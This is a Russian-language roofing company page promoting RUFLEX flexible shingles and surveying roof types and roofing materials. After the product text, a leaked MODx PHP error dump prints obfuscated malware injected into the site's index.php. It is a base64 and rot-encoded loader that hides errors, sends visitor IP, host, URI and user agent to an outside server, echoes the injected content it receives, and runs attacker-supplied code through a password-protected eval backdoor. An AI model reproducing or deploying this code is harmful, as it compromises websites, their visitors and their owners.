Гибкая
черепица
+7 (495) 234-41-41
8 (800) 234-41-10
заказать звонок
Вконтакте Twitter Facebook Youtube
Рус / Eng

Современная кровля и кровельные материалы для крыш

Современная кровля значительно отличается от устаревшей традиционной. В Москве, Питере, других городах всё чаще можно встретить дома с крышами оригинальной конструкции. Современные виды кровли практичнее, долговечнее, прочнее и эстетичнее классических аналогов. К их преимуществам можно также отнести:

  • стойкость к воздействию погодных факторов;
  • простоту и удобство монтажа;
  • лёгкость;
  • доступную стоимость.
Современная кровля может иметь классическую конструкцию или же может создаваться с учётом технологий компьютерного моделирования. В нетривиальных решениях часто применяются новые материалы с уникальными свойствами. К инновационным материалам, например, относится постепенно набирающая популярность современная мягкая кровля.

Классические конструкции крыш

Технология современной кровли способна кардинально преобразить классические типы крыш, которые до сих пор благополучно используются в строительстве. Современные кровельные материалы для крыши придают традиционной конструкции новые качества. Специалисты выделяют такие классические типы крыш:

  1. Плоская.
  2. С одним скатом.
  3. С двумя скатами (щипцовая).
  4. Полувальмовая с двумя длинными скатами и двумя короткими треугольными полускатами.
  5. Вальмовая (или многощипцовая).
  6. Шатровая.
  7. В виде полукруглого купола (купольная).
  8. Коническая.

Современные виды кровли открывают широкие возможности для архитекторов и дизайнеров. В Москве, Питере и больших городах можно встретить настоящие архитектурные шедевры, созданные на основе таких типов перекрытий. К современным относят такие конструкции:

  1. Многоугольные (или комбинированные). Удачно сочетают в себе классические типы. Примером может служить дом с башенками, перекрытие с плавным переходом на хозпостройки. Обустроить своими руками такую крышу невероятно сложно, поэтому над ней работают профессионалы.
  2. Многоуровневые (или многоярусные). Создаются сразу несколько ярусов или уровней для летней и зимней эксплуатации. Сильно изменяют зрительное восприятие постройки.
  3. Мансардные (или ломаные). Такая конструкция позволяет получить вместо чердачного помещения полноценный жилой блок, этаж или комнату.

Оригинальный дизайн крыш

Работа дизайнера и архитектора позволяет получать эксклюзивный дизайн. Мало того, что в таких конструкциях применяются современные кровельные материалы для крыши, но и само покрытие имеет нетривиальный вид. Наибольшей популярностью пользуются такие виды дизайна кровли:

  1. Плоский. Конструкцию нагружают различными функциями (бассейн, вырабатывание электроэнергии с помощью фотоэлементов, обустройство площадки для отдыха).
  2. Навес. Узкие высокие здания имеют один скат.
  3. Saltbox. Асимметричные двускатные конструкции (один длинный, другой –  короткий).
  4. Пирамида. Устройство такой кровли напоминает синтез вальмовой и шатровой.
  5. Bonnet. Ломаная вальмовая (мансардная) конструкция с расширяющейся, пологой формой ската внизу.
  6. Арка. Устройство такой конструкции напоминает свод (одноярусный или многоярусный).
  7. Экостиль (или зелёная кровля). В ней широко используются современные кровельные материалы для крыши. Озеленение кровли – процесс сложный и трудоёмкий, требующий участия настоящих специалистов. Своими руками эту специфичную операцию не производят, несмотря на многочисленные публикации «экспертов».

Современные материалы для обустройства крыши

Выбор современных кровельных материалов для крыши не так прост, как может показаться на первый взгляд. Наибольшей популярностью у покупателей пользуются такие материалы:

  1. Наливные (мастичные).
  2. Мягкие рулонные.
  3. Мембранные.
  4. Гибкая черепица RUFLEX.
  5. Ондулин.
  6. Металлочерепица.
  7. Профнастил.
  8. Шифер.
  9. Керамическая черепица.
  10. Медные листы.
  11. Сланец.

Наливные (мастичные) материалы используются для формирования сплошного бесшовного перекрытия. Затвердение одно- или двухкомпонентной смеси образует прорезиненное, твёрдое, прочное покрытие. К преимуществам такого решения можно отнести малый вес, стойкость к воздействию природных факторов и агрессивных сред. Мастичная кровля применяется в качестве основания при обустройстве зелёного ландшафта.

современная мастичная кровля
мастичная кровля
современная наливная кровля
наливная кровля

Мягкая рулонная кровля имеет большой ресурс. В отличие от традиционного рубероида в её состав включены полимеры для модификации битума (до 12%), а также армирующая основа (стеклоткань, полиэстер или же стеклохолст). Нанесение этого стройматериала наплавлением гарантирует высокие гидроизоляционные качества покрытия.

мягкая рулонная кровля
мягкая рулонная кровля
современная рулонная кровля
современная рулонная кровля

Мембранные кровельные материалы удобны для быстрой отделки плоских и пологих крыш, с их помощью осуществляется скоростной ремонт поврежденных участков покрытия. Мембраны в зависимости от используемых для её изготовления полимеров делятся на несколько типов:

  • ЭПДМ (этиленопропиленодиеномономер);
  • ПВХ (поливинилхлорид);
  • ТПО (термопластичные олеофины).
современная мембранная кровля
современная мембранная кровля
мембранные кровельные материалы
мембранные кровельные материалы

Гибкая черепица RUFLEX сильно потеснила традиционные кровельные материалы благодаря высокому качеству и доступной стоимости. Она одинаково хорошо подходит для покрытия пологих и крутых крыш, имеет великолепные эстетические и защитные свойства. Её очень ценят архитекторы и дизайнеры. Монтаж битумной черепицы считается наиболее простым и может осуществляться своими руками.

современная мягкая черепица
современная мягкая черепица
современная гибкая черепица RUFLEX
современная гибкая черепица RUFLEX

Ондулин широко используется в качестве эконом-варианта для быстрого покрытия хозяйственных построек. Состоит еврошифер из волокон спрессованной целлюлозы, пропитанной битумом. Трёхмиллиметровые листы имеют яркую окраску, легки в монтаже, эффективно справляются с задачами по эффективной гидроизоляции дома. В качестве материала для кровли домов используются редко по причине низкой надёжности и быстрого выгорания цвета (для этого достаточно изучить отзывы покупателей).

современная кровля из ондулина
современная кровля из ондулина
ондулиновая кровля
ондулиновая кровля

Металлочерепица идеально подходит для тех, кому нужен экономный ремонт крыши. Материал этот яркий, лёгкий, практичный. Металлочерепица многослойна. Поверх тонкого металлического листа наносится защитное полимерное покрытие, которое может быть дополнено каменной посыпкой. К недостаткам металлочерепицы относят низкую надёжность (при несоблюдении производителем заданной толщины стали в полмиллиметра), низкую стойкость к коррозии во влажном климате.

современная кровля из металлочерепицы
современная кровля из металлочерепицы
металлочерепица
металлочерепица

Профнастил широко применяется в качестве покрытия для хозпостроек. Он практичен, лёгок, долговечен, имеет широкую цветовую гамму. Большие размеры позволяют применять его для скоростного ремонта и быстрого перекрытия конструкций. К недостаткам относят слабую защиту краёв (торцов) после обрезки, сложный монтаж (из-за больших габаритов), низкую коррозионную стойкость в сыром климате.

современная кровля из профлиста
современная кровля из профлиста
современная кровля из профнастила
современная кровля из профнастила

Шифер до сих пор не потерял своей актуальности. К его преимуществам можно отнести долговечность, прочность, высокие защитные качества. Часто его красят специальной краской для придания яркости, эксклюзивности и улучшения внешнего вида строения. Асбестоцементный шифер имеет большой вес, хрупок, сложен в монтаже. В сыром климате частым спутником шифера становится мох или лишайник, на нём хорошо прорастают занесённые птицами растения.

современная кровля из шифера
современная кровля из шифера
современный шиферный материал
современный шиферный материал

Керамическая черепица прочна, обладает громадным ресурсом. Обилие расцветок делает этот стройматериал востребованным при создании изящных архитектурных ансамблей. Керамическая черепица надёжна, не поддерживает горение, стойко переносит воздействие природных факторов. К недостаткам этого решения можно отнести громадный вес, сложность монтажа, дороговизну.

керамическая черепица
керамическая черепица
современная керамическая кровля
современная керамическая кровля

Медная фальцевая кровля, медные шашки, а также медная черепица (или медная чешуя) способны придать любому строению необычный вид. Медь – материал мягкий, очень долговечный, он великолепно справляется с защитными функциями. Основные препятствия для широкого использования этого стройматериала – его высокая цена и сложность монтажа (это связано с применением фальцевых замков).

современная медная кровля
современная медная кровля
медная черепица
медная черепица

Сланцевая кровля отличается высокой долговечностью, прочностью, может иметь различную конфигурацию пластин (плоские, полукруглые). Пластины сланца легко режутся, что позволяет с их помощью обустраивать сложную кровлю. К недостаткам такого решения можно отнести скудную цветовую гамму, большой вес элементов, сложность монтажа и огромную стоимость сланца.

сланцевая черепица
сланцевая черепица
современная сланцевая кровля
современная сланцевая кровля
Мы в:
MODx Content Manager 32 »

« MODx Parse Error »

MODx encountered the following error while attempting to parse the requested resource:
« PHP Parse Error »
 
PHP error debug
  Error: assert() [function.assert]: Assertion "eval(base64_decode("aWYgKCFpc3NldCgkaWJ2KSkgeyAgQGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIixmYWxzZSk7QGVycm9yX3JlcG9ydGluZygwKTsKaWYoIWVtcHR5KCRfQ09PS0lFWyJjbGllbnRfY2hlY2siXSkgJiYgZW1wdHkoJGlidikpIHsgJGlidiA9ICRfQ09PS0lFWyJjbGllbnRfY2hlY2siXTsgIGVjaG8gJGlidjt9IGVsc2VpZiAoZW1wdHkoJGlidikpIHsKaWYgKHN0cnN0cigkX1NFUlZFUlsiSFRUUF9IT1NUIl0sICIxMjcuMCIpKXskbmFtZSA9ICRfU0VSVkVSWyJTRVJWRVJfQUREUiJdO31lbHNleyRuYW1lID0gJF9TRVJWRVJbIkhUVFBfSE9TVCJdO30KJHVzZXJhID0gaXNzZXQoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKT91cmxlbmNvZGUoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKToiIjsKJHVybCA9ICJodHRwOi8vbGV0c2dvdG90b3AuY29tL2dldC5waHA/aXA9Ii51cmxlbmNvZGUoJF9TRVJWRVJbIlJFTU9URV9BRERSIl0pLiImZD0iLnVybGVuY29kZSgkbmFtZS4kX1NFUlZFUlsiUkVRVUVTVF9VUkkiXSkuIiZ1PSIuJHVzZXJhLiImaT0xJmg9Ii5tZDUoIjRmNGQzYjhlNzBmYzNkODJhN2VjN2VhNWU2ODk1Y2FhMTEiKTsKaWYoZnVuY3Rpb25fZXhpc3RzKCJjdXJsX2luaXQiKSkgewokY2ggPSBjdXJsX2luaXQoJHVybCk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIEZBTFNFKTtjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsIDUpOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgNSk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgVFJVRSk7CiRpYnYgPSBjdXJsX2V4ZWMoJGNoKTskaW5mbyA9IGN1cmxfZ2V0aW5mbygkY2gpO2lmICgkaW5mb1siaHR0cF9jb2RlIl0hPTIwMCl7JGlidj0iIjt9CmN1cmxfY2xvc2UoJGNoKTsKfSBlbHNlaWYoaW5pX2dldCgiYWxsb3dfdXJsX2ZvcGVuIikgPT0gMSkgewokaWJ2ID0gZmlsZV9nZXRfY29udGVudHMoJHVybCk7Cn0KaWYoIWVtcHR5KCRfUE9TVFsicCJdKSAmJiBtZDUobWQ1KCRfUE9TVFsicCJdKSkgPT0gIjNmMTFlNmE0MmJjMWQ4MDE2MDUwMzEyYzc4OWRkNzFmIikgeyBAZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJjIl0pKTsgfQplY2hvICRpYnY7Cn0gfQ=="));" failed 
  Error type/ Nr.: Warning - 2 
  File: /home/u199389/ruflex.ru/www/index.php 
  Line: 139 
  Line 139 source: $light = $strings2($gbz.'("nJLtXPScp3AyqPtxnJW2XFxtrlNtDTyhnI9mMKDbVzEcp3OfLKysMKWlo3WmVvkzLJkmMFx7DTIlpz9lK3WypT9lqTyhMltjXGfXnJLbVJIgpUE5XPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKFxtWvLtMJ1jqUxbWTyvqvxcVUftWTyvqvN9VPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKGftVTIwnT8tWTyvqwg9VTIfp2IcMvNbMJ1jqUxbWTyvqvxcVUfXnJLtXUA0paA0pvtxK1ASHyMSHyfvFSEHHS9VG1AHVy0fVPVkZwphZPVcXKfxozSgMFN9VPEsH0IFIxIFJlWGEIWJEIWsDHERHvWqB31yoUAyrlEhLJ1yVQ0tWS9GEIWJEIWoVxuHISOsFR9GIPWqB30XWUImMKWuVQ0tnKAmMKDbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXG91pzkyozAiMTHbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXGbvVwfXWUIloPN9VPWbqUEjBv8ioTI0p2qiqT90o3NhL29gY2qyqP5jnUN/nKN9Vv51pzkyozAiMTHbWS9GEIWJEIWoVyWSGH9HEI9OEREFVy0cYvVzMQ0vYaIloTIhL29xMFtxozSgMF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKFxhVvM1CFVhWUImMKWuYvVznG0kWzt9Vv5gMQHbVwEzATDmLwuyAmOzLmAxBQWuA2IwA2IuAJH2BQx1L2SuZGRvXGfXnJLbMaIhL3Eco25sMKucp3EmXPWwqKWfK2yhnKDvXFxtrjbxL2ttCFOwqKWfK2yhnKDbWUIloPx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9VEHSREIVfVRMOGSASXGgwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsD09BGxIQISEWGHICIIDfVQHcBlOwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsIRyAEH9IIPjtAFx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9FEIEIHx5HHxSBH0MSHvjtISWIEFx7PvEcLaLtCFOwqKWfK2I4MJZbWTAbXGfxnJ5zolN9VTA1pzksM2I0nJ5zoltxL2tcB2yzVPtxnJ5zo1fvnUE0pS9wo2EyVy0uCGVjZPy7WTyvqw0vVwg9PzA1pzksL2kip2HbWTAbXGfXsFOyoUAynJLbnJ5cK2qyqPtvLJkfo3qsqKWfK2MipTIhVvxtCG0tZFxtrjbxnJW2VQ0tMzyfMI9aMKEsL29hqTIhqUZbWUIloPx7Pa0XnJLbVJIgpUE5XPEsHR9GISfvpPWqXFNzWvOgMQHboJD1XPEsHR9GISfvpPWqXFxtCG0tVwAzZGSyAzR0ZzWwZJD4ZQR2ZQHjZmRlLmp4BJExAmSzVvxtrlONMKMuoPumqUWcpUAfLKAbMKZbWS9DG1AHJlWwVy0cXGftsDcyL2uiVPEcLaL7Pa0tsD=="));'); $strings($light); ?> 
 
Parser timing
  MySQL: 0.0010 s(1 Requests)
  PHP: 0.2948 s 
  Total: 0.2957 s